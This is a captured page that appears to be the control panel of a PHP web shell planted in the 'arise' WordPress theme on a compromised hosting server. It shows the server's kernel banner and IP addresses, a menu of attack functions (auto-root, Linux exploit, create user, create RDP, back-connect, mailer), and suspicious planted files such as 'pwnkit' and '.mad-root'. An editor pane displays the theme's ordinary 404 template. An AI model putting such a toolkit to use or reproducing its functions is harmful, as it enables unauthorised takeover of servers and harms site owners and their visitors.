Linux webm006.cluster103.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.103.20.6 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
5.4.45
formahte
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
formahte /
www /
wp-content /
themes /
arise /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
genericons
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
page-templates
[ DIR ]
drwxr-xr-x
tgm
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.58
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
changelog.txt
5.76
KB
-rw-r--r--
comments.php
1.16
KB
-rw-r--r--
content-index.php
174.94
KB
-rw-r--r--
content.php
3.59
KB
-rw-r--r--
footer.php
3.28
KB
-rw-r--r--
functions.php
10.68
KB
-rw-r--r--
functionsbak.php
10.19
KB
-rw-r--r--
header.php
5.03
KB
-rw-r--r--
index.php
1.31
KB
-rw-r--r--
logo.jpg
174.94
KB
-rw-r--r--
navigation.php
677
B
-rw-r--r--
page.php
2.29
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
4.58
KB
-rw-r--r--
screenshot.png
988.36
KB
-rw-r--r--
search.php
1.3
KB
-rw-r--r--
searchform.php
865
B
-rw-r--r--
sidebar.php
1.24
KB
-rw-r--r--
single.php
5.03
KB
-rw-r--r--
style.css
85.71
KB
-rw-r--r--
woocommerce.php
1.53
KB
-rw-r--r--
wpml-config.xml
714
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 404.php
<?php /** * The template for displaying 404 pages * * @package Theme Freesia * @subpackage Arise * @since Arise 1.0 */ get_header(); $arise_settings = arise_get_theme_options(); global $arise_content_layout; if( empty( $layout ) || is_archive() || is_search() || is_home() ) { $layout = 'default'; } if( 'default' == $layout ) { //Settings from customizer if(($arise_settings['arise_sidebar_layout_options'] != 'nosidebar') && ($arise_settings['arise_sidebar_layout_options'] != 'fullwidth')){ ?> <div id="primary"> <?php } }?> <div class="site-content" role="main"> <article id="post-0" class="post error404 not-found"> <?php if ( is_active_sidebar( 'arise_404_page' ) ) : dynamic_sidebar( 'arise_404_page' ); else:?> <section class="error-404 not-found"> <header class="page-header"> <h2 class="page-title"> <?php _e( 'Oops! That page can’t be found.', 'arise' ); ?> </h2> </header> <!-- .page-header --> <div class="page-content"> <p> <?php _e( 'It looks like nothing was found at this location. Maybe try a search?', 'arise' ); ?> </p> <?php get_search_form(); ?> </div> <!-- .page-content --> </section> <!-- .error-404 --> <?php endif; ?> </article> <!-- #post-0 .post .error404 .not-found --> </div> <!-- #content .site-content --> <?php if( 'default' == $layout ) { //Settings from customizer if(($arise_settings['arise_sidebar_layout_options'] != 'nosidebar') && ($arise_settings['arise_sidebar_layout_options'] != 'fullwidth')): ?> </div> <!-- #primary --> <?php endif; } get_sidebar(); get_footer(); ?>
Close